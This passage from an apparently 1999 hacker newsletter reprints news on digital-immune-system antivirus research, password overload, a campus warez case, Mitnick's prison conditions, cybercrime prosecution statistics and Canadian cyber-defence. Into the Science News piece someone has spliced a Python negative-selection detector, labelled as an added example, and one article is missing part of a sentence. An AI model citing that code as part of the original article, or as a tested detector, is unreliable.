     Such a system also needs to be safe, reliable, and secure.
     
     A computer virus released in March aptly demonstrated the need for more-effective ways of fighting off computer viruses.
     Although warnings about the Melissa virus went out soon after it was identified, it spread as quickly as the alarms (SN: 5/8/99,
     p. 303). Within just a few days, the virus had circled the globe, sending countless unwanted E-mail messages across the
     Internet and clogging E-mail service at hundreds of organizations, forcing them to shut off their Internet connections.
     
     Although Melissa -- the first virus to mail itself around the world -- merely clogged E-mail systems, virus makers have already
     launched spin-offs of the virus designed to destroy data.
     
     The risk of computer infections rises as more information is exchanged through E-mail or over the Internet. Likewise, the
     potential damage that viruses can create multiplies as people send sensitive personal and corporate data over the Internet.
     Computer security experts also warn that the avenues for viruses to spread multiply dramatically as computers use software
     that's integrated so that one program can launch another.
     
     "There used to be plenty of time to analyze a virus before it spread, but Internet-borne viruses can spread around the world in
     hours or days," says Steve R. White of IBM's Thomas J. Watson Research Center in Yorktown Heights, N.Y. "In a world
     where things can travel this quickly and do this much damage, we have to have automated ways of dealing with them. It is
     silly to think that we can protect against these viruses manually."
     
     
     
     Computer viruses got their name from what White calls "an obvious but deep biological analogy." Like biological viruses, the computer versions replicate by attaching
     themselves to a host (a computer program rather than a human cell) and then co-opting the host's resources to make copies of themselves. Infection can lead to death:
     The computer crashes and all program information is irretrievably lost. Infection can also lead to sickness when the virus does not destroy any data but spreads and slows
     programs and communications. Even seemingly innocuous viruses may taint files and make the computer more likely to crash -- like a long-lasting, low-grade infection.
     
     Companies spend several hundred million dollars annually on antivirus products and services, and they lose even more in downtime when they need to take their systems
     off-line to prevent viral infections from spreading.
     
     Because antivirus programs can only identify the viruses they already know, they aren't effective against the 10 to 15 new viruses created every day. Worst of all, says
     White, "many users of antivirus software blissfully continue to use antivirus software that is more than a year out of date."
     
     Aside from frequent updates, there are few ways of strengthening this system. Some antivirus programs can monitor a computer system for viruslike behavior, such as
     making a file bigger without adding new data, but such systems are prone to false alarms and virus makers can take steps to evade such detection systems.
     
     In the early 1990s, White and his colleagues at IBM dreamed of a digital immune system for computers (SN: 7/23/94, p. 63). For a model, they looked to the human
     immune system, which is constantly bombarded by infectious agents it has never before encountered and yet to which it generally responds quickly.
     
     Computer virus makers often reuse key parts of existing viruses in their new creations, White explains. An immune system should be able to identify previously
     unrecognized viruses by these short so-called genes, which often are critical to the viruses' function. Although conventional software might contain some of these genelike
     sequences, the presence of many is typically a sign of viral infection, White says.
     
     When a computer participating in a pilot test of this digital immune system finds virus genes or any other signs of infection, it strips out confidential data and encrypts the
     rest. The altered file then goes to a central computer facility at IBM to be analyzed. A computer there routes the virus to a test machine that lures the virus into replicating
     by running a variety of programs. If any of these decoy programs become infected, the test computer attempts to pull out a signature that can identify the virus in other
     computers.
     
     The signature and a prescription to strip the virus out of infected files are then sent back to the central computer. It adds the new virus to its database and sends the
     information on detection and treatment back to the infected computer. IBM's automated process typically takes less than 5 minutes to identify a virus signature and derive
     a prescription, the developers claim.
     
     Uninfected computers will also be "vaccinated," as the IBM team puts it, against infections with this new virus as soon as they check the updated database. Ultimately,
     White envisions, uninfected computers will be vaccinated automatically.
     
     Later this summer, IBM, in conjunction with a leading antivirus-program developer, Symantec Corp. in Cupertino, Calif., plans to release an antivirus plan that includes such
     a digital immune system. "This is the first step toward a comprehensive system that can spread a global cure for a virus faster than the virus itself can spread," White
     says.
     
     The IBM researchers are still trying to develop ways to mimic another trait of the immune system. An infected cell produces chemicals signaling distress, warning neighbor
     cells to put up barriers to slow the spread of the virus. Thus, when the immune system develops ways of attacking the intruder, it can quickly outpace the spread of the
     virus.
     
     
     
     The biological analogies of computer security may stretch even further than IBM's vision, says Stephanie Forrest of the University of New Mexico in Albuquerque. The
     human immune system identifies foreign invaders because they don't carry the body's typical flags of "self," not because they resemble other infectious agents. Forrest and
     her colleagues have found a way for a computer to identify self.
     
     By looking at short sequences of signals between a program and the computer's operating system, she and her colleagues have defined patterns unique to each machine.
     Abnormal patterns may be a sign of infection. For example, a program making unusual demands on system resources has very likely been co-opted by a virus or is being
     attacked by a hacker, says Forrest.
     
     "We've shown pretty convincingly that looking at these short sequences of self gives good discrimination between what is self and what isn't," she says. Such a system
     can be very efficient, Forrest points out. The protected computer uses its resources to check only programs and files that it is using.
     
     She and her colleagues have also shown that information packets flowing into and out of a network of computers hooked to the Internet show patterns recognizable as self
     or nonself.
     
     Like white blood cells in the human body, a digital immune system can create antibodies that recognize foreign material, Forrest says. To minimize the chances that the
     antivirus program will attack the computer itself, it would always destroy antibodies that flag patterns that are intrinsic to the computer. Using the remaining digital
     antibodies, the system will periodically check for abnormal patterns that may signify virus infections or intrusions from hackers.
     
     Forrest and her colleagues are working on a system that will allow a computer to continually learn to redefine itself, so the computer can accept new programs without
     flagging them as viruses. The researchers have not yet explored how to attack viruses once identified.
     
     Forrest says that a self-recognizing system will be practical even for individual computers connected to the Internet and used primarily for E-mail, writing, designing graphic
     presentations, and perhaps a little programming.
     
     Though still theoretical, Forrest's approach may offer many advantages. A different immune system would run on every computer. Since every computer would create
     different antibodies, a virus that evaded one computer might not escape detection by another, limiting the spread of the virus. Likewise, a person who broke into one
     computer network and managed to avoid detection by that system might not be so successful on another network, she says.
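
     Forrest's scheme as described above (short call sequences define self, antibodies that match self are destroyed, every machine holds a different antibody set), sketched as an added example; it is not code from the article or from Forrest's group. The system-call names, the traces, the window length of 3 and all function names are constructed assumptions.

```python
import random

WINDOW = 3  # length of the "short sequences"; an assumed value

# System calls the monitor knows about (constructed for this example).
ALPHABET = {"open", "read", "mmap", "close", "exec", "socket", "write"}

# Constructed traces of one program during normal operation.
NORMAL_TRACES = [
    ["open", "read", "mmap", "read", "close", "open", "read", "close"],
    ["open", "mmap", "read", "close", "open", "read", "mmap", "read", "close"],
]
# Constructed trace of the same program behaving abnormally.
SUSPECT_TRACE = ["open", "read", "mmap", "exec", "socket", "write", "close"]


def windows(trace, n=WINDOW):
    """All length-n sliding windows of a trace, as tuples."""
    return [tuple(trace[i:i + n]) for i in range(len(trace) - n + 1)]


def build_self(traces, n=WINDOW):
    """The 'self' database: every short sequence seen in normal behaviour."""
    return {w for t in traces for w in windows(t, n)}


def mismatch_rate(trace, self_db, n=WINDOW):
    """Fraction of a trace's windows that are absent from self."""
    ws = windows(trace, n)
    return sum(w not in self_db for w in ws) / len(ws) if ws else 0.0


def generate_detectors(self_db, count, seed, alphabet=ALPHABET, n=WINDOW):
    """Negative selection: draw random candidate 'antibodies' and destroy
    every candidate that matches self. A different seed gives a different
    detector set, which is how each machine ends up with its own."""
    symbols = sorted(alphabet)
    rng = random.Random(seed)
    self_in_space = sum(1 for w in self_db if len(w) == n and set(w) <= alphabet)
    # Never ask for more detectors than there are nonself sequences.
    target = min(count, len(symbols) ** n - self_in_space)
    detectors = set()
    while len(detectors) < target:
        candidate = tuple(rng.choice(symbols) for _ in range(n))
        if candidate not in self_db:  # candidates matching self are destroyed
            detectors.add(candidate)
    return detectors


def scan(trace, detectors, n=WINDOW):
    """Window positions in a trace that some detector recognises as nonself."""
    return [i for i, w in enumerate(windows(trace, n)) if w in detectors]


def relearn(self_db, detectors, trace, n=WINDOW):
    """Accept a new program as self: add its sequences to the database and
    destroy any detector that would now flag them."""
    new = set(windows(trace, n))
    return self_db | new, detectors - new


if __name__ == "__main__":
    self_db = build_self(NORMAL_TRACES)
    print("self sequences:", len(self_db))
    print("suspect mismatch rate:", mismatch_rate(SUSPECT_TRACE, self_db))
    for host, seed in (("host A", 1), ("host B", 2)):
        detectors = generate_detectors(self_db, count=120, seed=seed)
        print(host, "flags windows", scan(SUSPECT_TRACE, detectors))
```

     Because each host holds only a random part of the nonself space, one host can miss a window that another flags; that is the per-machine diversity the article describes, and also the source of missed detections when the detector set is small.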
     
     "They've taken a much more exact analogy with biology by developing digital antibodies," says White. "But the analogy breaks down. All of my cells come from me, so my
     immune system can define self. But I put files on my computer every day.... This system may be very good for intrusion detection, but it may not be a good approach for
     viruses, because it will make too many mistakes. Our approach is more specific for viruses."
     
     
     
     Both research groups caution that in nature, no defense system remains perfect forever. Just as white blood cells and viruses engage in a delicate dance, each evolving to
     outwit the other, so will computer viruses and antivirus technology, White says.
     
     Viruses are getting more dangerous all the time, he says. Several programs for automating the development of macro viruses are circulating, meaning that the virus-writing
     community can create viruses faster than ever.
     
     There are even some indications that viruses may be evolving on their own, White says. For example, some versions of Microsoft Word may make minor errors when
     copying viruses. These changes may disable the virus, or they may make the virus harder to spot. Also, if two or more viruses successfully infect a computer, one may
     accidentally copy itself into the other virus, creating a new kind of bug, he says. While uncommon so far, these scenarios are certainly threatening, White notes.
     
     Whatever the form of the threat, the goal of protecting computer systems remains. "What we would ideally like is for a computer to behave the way the human body does,"
     says Sushil Jajodia of George Mason University in Fairfax, Va. "When we are attacked by a virus, we get sick, but the immune system detects the virus, defeats it, and
     heals the damage. Computer systems are not like the human body, though, in that we need to provide the technology."
     
     Because programs and operating systems are not usually designed with security in mind, antiviral programs will always be behind the curve, says Jajodia. "It still isn't clear
     how well this idea [of digital immune systems] will work, but we have no better alternative for detecting virus infections," he says.
     
     Computer users have demanded ease of use but not security, says Forrest. "While people are becoming aware of the issues...they don't feel personally threatened yet."
     She notes that "when the Internet took off in the early '90s, it became evident that the computer-security problem was going to become everybody's problem."
     
     Jajodia, editor-in-chief of the Journal of Computer Security, says that programmers should address the problem of viruses long before people begin using newly developed
     software.
     
     Designing computer systems and programs with security in mind is an important first step, he says. More programs should check digital signatures to confirm that
     transferred files and computer code come from a trusted source. Better encryption systems, which help ensure that information has not been altered in transit from one
     computer to another, would make it harder for people to design viruses and for viruses to spread, he says.
     
     Computer-security experts warn that no single set of changes will be enough to completely protect increasingly interconnected computer systems. They hope, however,
     that new security measures, such as digital immune systems, will fend off future epidemics.
     
     Computer viruses: Then and now 
     
     The first computer virus, called Brain, appeared in 1987. The people who created the first viruses hitched them to operating systems (such as DOS) or to applications (such
     as games or editing programs). Some of these viruses are still circulating. With these viruses, when a user turns on an infected computer or runs an infected program, the
     viral code copies itself into the computer's memory -- and from there into any subsequent applications the user runs. These viruses spread only when a computer user
     shares tainted files and programs with other people.
     
     On the other hand, viruses like Melissa latch onto macros, small programs hidden in word processing software. For example, when an unsuspecting recipient of the
     Melissa virus opened an infected document written in Microsoft Word, the virus activated and hijacked another program known as Microsoft Outlook. This program E-mailed
     copies of the infected document to the first 50 people listed in the program's address directory. The virus spread so quickly because so many people use both Word and
     Outlook.
     
     Until macros became commonplace, viruses couldn't infect data files, including word processing documents and spreadsheets. Macro viruses proliferate rapidly because
     many people share data files freely, and they do so primarily through E-mail. Once one data file is infected, a virus can infect all other data files of that application as soon
     as they are opened.
     
     By the end of 1998, programmers and users had identified more than 30,000 viruses. Viruses of all sorts now affect millions of computers every year.
     
     
     From Science News, Vol. 156, No. 5, July 31, 1999, p. 76. Copyright © 1999, Science Service.
     
     @HWA
         
46.0 Forgot your password? Try 'way2many'    
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.nytimes.com/library/tech/99/08/circuits/articles/05pass.html
     
     August 5, 1999


     Forgot a Password? Try 'Way2Many'


     Better Online Security Has Meant More Passwords, and
     More Frustrated Users 

     By JENNIFER 8. LEE

     A few months ago, Kevin McGuire, a computer consultant in
     Lombard, Ill., designed a new computer system for a client. After
     a break from the project, he sat down at the computer to start up the
     system but couldn't get into the server. He had forgotten his password. 

     A sense of panic gripped him as he rapidly typed in variations on his
     favorite passwords. Two days later he gave up and rebuilt the system
     from scratch. 

     Not everything can be recreated, though. Also lost in password
     purgatory is a year's worth of personal journal entries he kept in a
     Microsoft Word document on his personal computer. 

     "I wanted the password to be different so that people wouldn't be able to
     get to my journal," McGuire said. "Unfortunately, neither can I." 

     It is understandable that McGuire would drop a password or two. On a
     regular basis, he must remember three dozen passwords to gain access
     to computer networks, software programs, e-mail, voice mail, fax mail,
     Web sites, ATM's and even the security system for his house. 

     Forgotten passwords are an inevitable consequence of the digitization of
     everything from money to mail. Twenty years ago, people had to
     remember only their Social Security number and maybe a phone number
     or two. But since the introduction of the automated teller machine, people
     have accumulated an arsenal of passwords, access codes and personal
     identification numbers to use everything from answering machines to
     office bathrooms. A result is lost computer files, inaccessible accounts
     and a lot of banged-up keyboards. 

     "What is nightmarish is that we rely so much on information that comes
     from different sources," said Alessandro Piol, a managing director of
     Investco Private Capital in New York, who has been locked out of his
     e-mail account while conducting coast-to-coast venture capital
     negotiations. "If you are locked out of a system, it's like losing a limb." 

     The exponential growth of Web sites creates an exponential growth in
     forgotten passwords. Almost all password-protected sites either
     encourage people who have forgotten their passwords to reregister or
     provide a mechanism where they can automatically retrieve their
     password. The New York Times on the Web site estimates that more
     than 1,000 people forget their password to the site each week, and 10 to
     15 percent of its registrants are duplicates. 

     Of course, many computer users simply do what computer security
     experts warn them not to: use the same password for everything. But
     even that strategy is becoming more difficult because various computer
     systems have different requirements for the rendering and length of the
     passwords. 

     Ron Dilley is an extreme example of the password problem. Dilley, a
     network administrator for Applied Digital Access in the San Diego area,
     maintains 129 active passwords, 37 personal ones and 92 for work. 

     He sees himself as the archetypal wired citizen of the future. 

     "I suspect that we will be totally inundated with passwords of one form
     or another in the next 10 to 20 years and possessing 129 passwords will
     be the norm," he said. Dilley began to use a Palm organizer to track his
     passwords. Every few weeks, he forgets to take his Palm when he leaves
     home and makes a 50-minute round-trip back home to pick it up. 

     Forgotten passwords cost millions of dollars annually in help-desk costs
     and lost productivity -- incidents like McGuire's rebuilding of the
     computer system from scratch. Industry estimates say 20 percent to 50
     percent of all calls to company help desks are from people needing their
     passwords reset. According to the Gartner Group, an organization with
     2,500 desktop computers can spend more than $850,000 a year
     resetting passwords. 

     The requests for password help "are considered to be noise and nuisance
     by help-desk staff, because they are so highly repetitive," said John
     Jacobs, president of Network Support Technologies, a company in
     Burlington, Mass., that provides help-desk services. 

     Forgotten passwords are a product of the computer's ability to store
     more information than the human brain can. 

     "In the old days you just had to yell out, 'Zog, it's me,' and he would
     let you into the cave without clubbing you," said Prof. Irving
     Biederman, a cognitive neuroscientist at the University of Southern
     California. "Now you need all these passwords to get access anywhere." 

     Research confirms the intuitive: the more we are asked to remember, the
     more likely we are to forget. The brain's capacity for remembering is
     indefinite as long as it has associations for the memories. 

     "The design of human memory and the design of computer architecture is
     at a crossroads," said Steve Pinker, a cognitive neuroscientist at the
     Massachusetts Institute of Technology. "A computer password must be
     arbitrary enough that people can't guess it, but human memory is
     designed to remember things that are not arbitrary." 

     Whereas short-term memory usually holds between five and nine items,
     scientists say there are no limits on long-term memory capacity -- as long
     as people have associations for those memories. 

     That is why people have a natural impulse to choose passwords based
     on familiar things -- children's birthdays, spouse's name, favorite sports
     team -- rather than incomprehensible strings like 3B#$Ir or 7*$3fg.
     According to Dr. Pinker, there is no neurological reason that given strong
     enough associations, people shouldn't be able to recall 129 passwords,
     "like you can remember an indefinite number of names of friends." 

     A nuisance for computer users is also a growing expense for companies. 

     The rampant growth of passwords has spawned various strategies for
     handling scattered bits of information. Some people keep lists of
     passwords taped to walls or to the underside of their keyboards, much
     to network administrators' dismay. Others keep lists in small
     notebooks or in files stored on their computers. 

     Some high-security institutions like financial companies and hospitals
     assign passwords instead of letting users choose, or force users to
     change their passwords every 30 or 60 days, which results in periodic
     spikes in reset calls to technical support staffs. 

     Resetting of passwords has become so costly to companies that some
     are choosing to automate the process. Password reset software
     eliminates the need for harried users to depend on help desks by allowing
     them to maintain their own user profiles. Merrill Lynch and Boeing both
     recently purchased such systems from the Courion Corporation. 

     Michael J. Koszenski, a computer technician in Lexington, spent 2,000
     hours of his own time creating a password database software for his PC
     after being disappointed with various password tracking programs. "It
     basically goes back to if you want something done right, you have to do it
     yourself," said Koszenski, who has 30 or so passwords and access
     codes to manage. For protecting his password program, there is yet
     another password that he keeps in his head. 

     The proliferation of passwords and the propensity to lose them has
     helped fuel a cottage industry of companies and consultants who recover
     passwords using computer programs. 

     While most password recovery requests come from people who are
     trying to retrieve passwords of dead relatives or disgruntled former
     employees, recovery businesses estimate that between 15 percent and
     25 percent of requests come from people who have forgotten their own
     passwords on documents. Tax time is a popular time for people to forget
     passwords, particularly those on old financial files. So, too, are the
     holidays. 

     "For about a week after New Year's people call up saying, 'I got drunk
     over the holidays, I changed my password on a whim and I can't
     remember it,'" said Amber Schroader, general manager of Access Data
     in Provo, Utah, which sells about 600 password recovery software
     packages a month. 

     Among the most common requests are those involving passwords for documents
     created with Microsoft Word or Excel, which are easy for the companies
     to recover because those programs do not have strong encryption. The
     majority of popular software applications produced in the United States
     and distributed internationally have intentionally weak encryption since
     this country has strict controls on the export of encryption tools and
     products, said Bob Weiss, president of Password Crackers, a
     Web-based password recovery consulting firm. "People are surprised by
     how many software products listed on our site are not secure," he said. 

     There are some emerging high-tech solutions to the password deluge.
     Biometric devices that recognize fingerprints, faces and voices, and smart
     cards that are embedded with computer chips are gaining in popularity.
     Matchbox-size fingerprint recognition devices for the PC are now
     available for as low as $99. So-called smart cards, which carry digital
     signatures and are used for phone calls and purchases, are growing at a
     rate of 30 percent a year, predominantly in Europe. 

     Piol, the venture capitalist, once taped a piece of paper listing his
     passwords on the wall by his desk, but a few months ago he started using
     a fingerprint scanner, U.are.U, to help manage the passwords. Impressed
     by the device, Piol tore down the paper and led a $9 million
     venture capital investment in the company, Digital Persona. 

     But until fingerprint scanners and smart card readers become as standard
     on desktops as computer mice, people will still have to struggle with the
     chore of password management. The University of Michigan is teaching
     its students a hygienic, low-tech approach to the problem. Treat
     passwords like underwear, the university says: Never let friends borrow
     them and never leave them lying about. And as anybody's mother would
     say, change them often. 

     @HWA
    
47.0 A Former Network Administrator Faces Felony Charges in Hacker-Site Case
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://chronicle.com/cgi2-bin/printable.cgi
     
     A Former Network Administrator Faces Felony Charges in Hacker-Site Case
     
     By FLORENCE OLSEN
     
     A 25-year-old former computer-network administrator for the University of Oklahoma
     faces criminal charges under the state's Computer Crimes Act after allegedly
     using the university network to operate a site for hackers. 
     
     which heavy use mysteriously disabled the campus network just as upperclassmen were
     arriving for the fall term. Authorities are investigating whether others were
     involved. 
     
     The heavy usage had the effect of reducing the capacity of the campus backbone from 
     "a 12-inch-diameter pipe to one no bigger than a stir straw," says Lieut.
     Jeffrey Harp, a public-safety officer at the university. 
     
     At the time, university officials seized more than a half-dozen unauthorized Internet
     servers operating in two rooms assigned to residence-hall advisers in Walker Center,
     a 12-story dormitory on the university's campus, in Norman. The Daily Oklahoman reported 
     that Mr. Breding is suspected of operating a "warez" site (pronounced "wares"), where 
     members of the Internet underground copied and exchanged pirated commercial software after
     hackers had cracked the files' copyright-protection codes. 
     
     Campus police say they seized one computer that the former network administrator allegedly
     had set up for a commercial purpose -- serving as host for others' Web pages. 
     
     If convicted, Mr. Breding could be punished with up to a 10-year prison sentence and a fine
     of as much as $100,000. A hearing is set for August 17. 
     
     University police spent 11 months and $20,000 on equipment, training, and consulting services
     to investigate the incident before turning the case over to the district attorney's office.
     "It was an eye-opening case for us," Mr. Harp says.  
     
     "It taught us that we needed to get up to speed on investigating computer crime," he says, and
     in turn led department detectives to seek further training and certification as forensic computer
     investigators. "It was our first case like this, and we're trying to prepare ourselves for the 
     next one." 
     
     Mr. Breding was charged under the state's Computer Crimes Act, passed in 1984 and updated several
     times since. The act makes it a felony to knowingly or willfully exceed one's authorized use of 
     computer-network resources or to disrupt those services to others. Tera Duke, the assistant district
     attorney, says it is the first such case filed under that statute in Cleveland County District Court,
     in Norman. 
     
     Ms. Duke says she is unaware of any pending federal charges related to the case. 
    
    
    @HWA
    
      
48.0 Happy Birthday Kevin
     ~~~~~~~~~~~~~~~~~~~~
     From http://www.antionline.com/s     
     
     Mitnick's Life - As It Stands Now 
     Monday, August 2, 1999 at 1:20:04
     by Kimberly Tracey - Writing For AntiOnline 

     For a few years I was talking to Kevin almost every day and sometimes
     several times a day. Right now my work prevents me from being in
     touch with him every day, but I know people who are in contact with
     him, so I stay current.

     Here's a little bit about Kevin's life at MDC:

     At MDC there is no yard for exercising. They have no place to exercise
     outside where they can sit in the sun. Whenever the guards call a
     "lockup," the inmates are rounded up and taken to a very large balcony
     outside. If you want to use a bathroom, you go to the one in your cell.
     When Kevin was sleeping on the floor, he had to use the toilets of other
     inmates.

     There are two TV's on Kevin's floor. The last time I heard, one TV was
     controlled by the blacks, and the other was controlled by the Hispanics.
     These two groups decide what everyone will watch. A white Jewish
     guy like Kevin doesn't have much of a say in the programming. There
     are vending machines on the floors, and there is at least one microwave
     oven. When the food is lousy, which is most of the time, inmates buy
     food from the guards or from someone in the kitchen and prepare meals
     and share them with each other. That is why Kevin accumulated cans
     of tuna and Pepsi a couple of years ago because these items are very
     important when you have nothing else to eat. And the tuna is that brown
     low-grade smelly stuff that I hate....no white albacore tuna at MDC!

     MDC brought in a couple of exercise bikes and they were broken
     almost immediately. I'm not sure what Kevin uses to exercise now.
     They may have gotten some new equipment. When he said he just
     finished a "workout," that could have been pushups, situps, and lifting
     some weights, if they have them. They might consider weights potential
     weapons, I don't know.

     Whenever any of us send Kevin money, it is put into his account and he
     is given a receipt telling him the amount. And unless they have changed
     the system, he doesn't know who sent him the money. And if you send
     him a personal check or a money order from the bank, the money is held
     up for weeks before it is placed into his account. If you send him a
     money order which you can buy from the Post Office, that money is
     placed into his account immediately. Therefore, if you are near the Post
     Office and want to help Kevin, pick up a Postal Money Order and send it
     to him with a note telling him that you included a MO for $10 or
     whatever the amount was. Then regardless of whether MDC informs
     him where the money came from, he will know directly from you what
     was sent, and he will appreciate it very much.

     Whatever money Kevin receives is spent on stamps, envelopes, paper,
     shaving and bath items like soap and toothpaste, vitamins, tennis shoes,
     plain white Hanes t-shirts, etc.

     When Kevin makes calls, he goes to one of the three phones on the
     floor and leans against the wall as he places his collect calls. He is only
     allowed to call collect, and Pac Bell charges around $2.00 for every call
     accepted by the party he is calling plus the minute rate. Each call is
     limited to 20 minutes. The computerized operator breaks in at 19 minutes
     and tells you that there is one minute remaining, and then 15 seconds
     and you are cut off exactly at the 20 min point. If Kevin is lucky, he
     finds a stool he can sit on while he is talking. Usually, each morning
     inmates sign up for phone time. If you have a few extra dollars, you are
     able to buy someone's phone time. MDC doesn't like this practice, but
     they all do it and most of the time the guards leave you alone. On this
     floor where Kevin resides, phones are shut off at 9:45 p.m. They are
     turned back on around 7 or 8 a.m.

     During the day inmates roam around in one big "general area." Many
     play cards. There is at least one ping-pong table because you can hear
     the ball being hit back and forth in the background. Inmates can sign up
     for library time. Kevin is still being allowed to work on his computer
     during the day, no weekends.

     Kevin and others can buy cheap Sony Walkmans from the prison
     commissary. They can play the radios, but they are not allowed CD or
     tape players. Kevin's attorney, Donald Randolph, can bring these items
     to the "attorney room" and Kevin can listen to tapes and view a video if
     he is with his attorney. So don't send Kevin tapes or CD's unless you
     send them directly to his attorney. And then they may never reach
     Kevin because he is working on his case when his defense team visits
     him.

     Pretty grim, right? Your letters, cards, jokes, magazines, and different
     items you send Kevin break the monotonous schedule he faces every
     day. He may not have the time to write back to every person who
     writes to him, but he reads everything and tells his friends and family
     how much the news from the outside world means to him. And Kerry
     and Emmanuel and the rest of the people who hear from Kevin will tell
     you that he appreciates the support from this mailing list and those who
     visit his site and inform the world about him and his case.

     BTW: 

     Kevin's birthday is August 6th. If you would like to send him a card or
     gift, you can mail it to:

     Kevin Mitnick
     89950-012
     P.O. Box 1500
     Los Angeles, CA 90053 
     
    @HWA
    
49.0 Cybercrime up 43%
     ~~~~~~~~~~~~~~~~~~
     
     http://www.zdnet.com/filters/printerfriendly/0,6061,2310082-2,00.html
     
     --------------------------------------------------------------
     This story was printed from ZDNN,
     located at http://www.zdnet.com/zdnn.
     --------------------------------------------------------------
     
     Study: Cybercrime cases up 43 percent
     By Kevin Poulsen, ZDNN
     August 5, 1999 3:54 PM PT
     URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310082,00.html?chkpt=hpqs014
     
     Federal law enforcement agencies referred a record number of computer crime cases for
     prosecution last year, but most of them were rejected by government attorneys, according to a legal
     journal report released Wednesday. 
     
     The report, authored by attorney and electronic privacy advocate David Banisar, and based on data
     obtained under the Freedom of Information Act by the Transactional Records Access
     Clearinghouse, appears in this week's Criminal Justice Weekly. It's believed to be the first
     independent analysis of the government's war on computer crime. 
     
     In all, investigators from the FBI and other agencies offered 419 computer crime cases to federal
     prosecutors in 1998, up 43 percent from 1997, and more than three times as many as in 1992. At the
     same time, prosecutors filed charges in only 83 cases.
     
     That ratio of referrals to prosecutions, approximately 5 to 1, is significantly lower than the overall
     rate for federal prosecutions in all categories. In 1998, Banisar said, there were 132,772 referrals at
     the federal level, and 82,071 prosecutions, or about one prosecution for every 1.6 referrals. 
     
     FBI: Hard to prove
     "Computer crime is terribly hard to prove," says FBI spokesperson Debbie Weierman. "Every one is
     handled on a case by case basis, and I can't give you a general reason for the difference in figures." 
     
     According to the report, each year between 1992 and 1998, the Department of
     Justice has declined to prosecute between 64 percent and 78 percent of the
     cases brought to them. Forty percent of the rejected cases cited lack of
     evidence of criminal intent, weak or insufficient admissible evidence, or no
     evident federal offense. Another 15 percent were referred to state authorities
     for prosecution. The remaining cases may be outstanding, or reclassified under
     another category. 
     
     A former assistant United States attorney said he is not surprised by the
     results, and that in many ways computer crime cases are unique. 
     
     "There are serious evidentiary questions and jurisdictional questions in these
     cases," says Mark Rasch, a former computer crime prosecutor, now working as a computer security
     consultant for Global Integrity, based in Virginia. "Law enforcement may be presenting you with a
     perfectly good case, against a defendant in Kuala Lumpur." 
     
     Moreover, he said, "Juveniles are frequently the ones that get caught. So while the FBI may be able
     to put together a perfectly cohesive case against a juvenile, that's the kind of case that may be
     declined by the United States Attorney's office by their discretion." 
     
     Unique challenges
     Justice officials hadn't reviewed the statistics, but agreed that there are unique challenges to
     prosecuting computer crime. 
     
     In 1998, the average sentence for those convicted was five months, with over half of the defendants
     receiving no jail time. Since 1992, 196 people have been convicted and 84 imprisoned in cases
     classified as federal computer crimes. 
     
     Only 57 cases reached disposition last year, 47 ending in convictions, primarily in plea agreements,
     and 10 ending with the status of "not successful" -- a category that includes dismissals and not-guilty
     verdicts. 
     
     Of the cases that ended in 1998, the FBI initiated the most, with 21 convictions, and eight
     unsuccessful prosecutions. The Secret Service, Treasury Department and IRS claim the remaining
     28 convictions and two failed prosecutions, says Banisar, a columnist for the legal journal, and
     co-author of The Electronic Privacy Papers. 
     
     Because referrals can take years to become prosecutions, direct correlation from year to year is a
     tricky matter, Banisar cautioned. But he said the overall statistics are telling. 
     
     "For an issue that the federal government is making such a major deal out of, trying to stop computer
     crime and information warfare, there's remarkably few prosecutions," he said. 
     
     Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.     
              
     @HWA    
     
50.0 Canada Can't Keep Up With CyberCrime 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      An intelligence brief prepared by the RCMP says that the
      Canadian police lack the necessary skills and personnel
      to protect the nation's infrastructure from infocriminals
      and cyber terrorists. 

      Ottawa Citizen
      http://www.ottawacitizen.com/national/990805/2686261.html
      
     Police can't handle cyber threats:
     RCMP report

     Mounties say Canada is 'lagging behind' in
     creation of hacker-defence systems

     Jim Bronskill
     The Ottawa Citizen

     The RCMP say Canadian police lack the necessary skills and personnel to
     meet the growing threat to national security from computer hackers. 

     Canada is "lagging behind" other advanced countries in building defences to
     protect communication, power, water and banking systems, warns an
     intelligence brief prepared by the force in mid-June. 

     "There is a general lack of awareness about the nature and level of threat
     posed to national security by cyber attacks and the level of defence and
     response that would be required," says the brief, obtained under the Access to
     Information Act. 

     "Several government departments dealing with an increasing number of
     sophisticated attacks are seeking guidance, support and assistance from law
     enforcement, only to find there is a lack of skilled and trained resources." 

     The assessment is the latest in a string of warnings sounded by Canadian
     security agencies about the vulnerability of the country's information networks.

     A special Senate committee and the Canadian Security Intelligence Service
     have also underscored the threat to digital networks and data banks from
     hackers, electronic spies and cyber-terrorists. 

     The RCMP noted an increase during the last year in the number of computer
     breakins, data thefts and system disruptions, a trend that does not bode well. 

     "The likelihood of a serious, deliberate and targeted attack to a Canadian
     critical-infrastructure system has increased from low to medium, and the
     impact of such an attack remains high," says the RCMP brief. "In the last five
     years, the capability to intrude into systems has increased dramatically as the
     cost of technology has plummeted." 

     On the Internet, there are Web sites, electronic bulletin board services and
     chat rooms dedicated to discussing and trading hacking tools and methods. 

     A group known as H4G1S claimed responsibility for breaking into and altering
     13 major U.S. and Canadian corporate Web sites in April, notes the RCMP
     document. A more serious attack could have the cascading effect of the
     January 1998 ice storm that denied electrical power to parts of Eastern
     Canada. 

     The brief's worrisome tone does not surprise Andrew Mackie, director of
     Manitoba's fledgling information protection centre. 

     "We are way behind the other countries," he insisted. 

     Mr. Mackie said the United States, Australia, Britain and other European
     countries have moved more quickly than Canada to set up national centres to
     detect and prevent attacks. 

     "We don't even have a plan right now. We're just working on it." 

     RCMP Sgt. Andre Guertin said the force sees a rising threat to Canadian
     systems in the immediate future because of the heightened potential for
     sabotage due to the millennium computer bug. 

     The force has established Project Solstice to ensure governments and
     businesses are aware that terrorists could take advantage of the computer
     glitch. 

     For instance, a company might be tempted to waive security screening in the
     rush to hire a repair crew to make systems Y2K compliant. 

     The RCMP have been assisting the U.S. Federal Bureau of Investigation on
     computer-crime cases, but the memo notes "difficulties encountered with
     Canadian collaboration and investigative support" in international probes,
     raising issues of co-ordination, resources and sovereignty. 

     Mr. Guertin said some of these questions were broached when U.S. and
     Canadian officials met in Charlottetown in June to discuss cross-border crime.
     
     @HWA
     
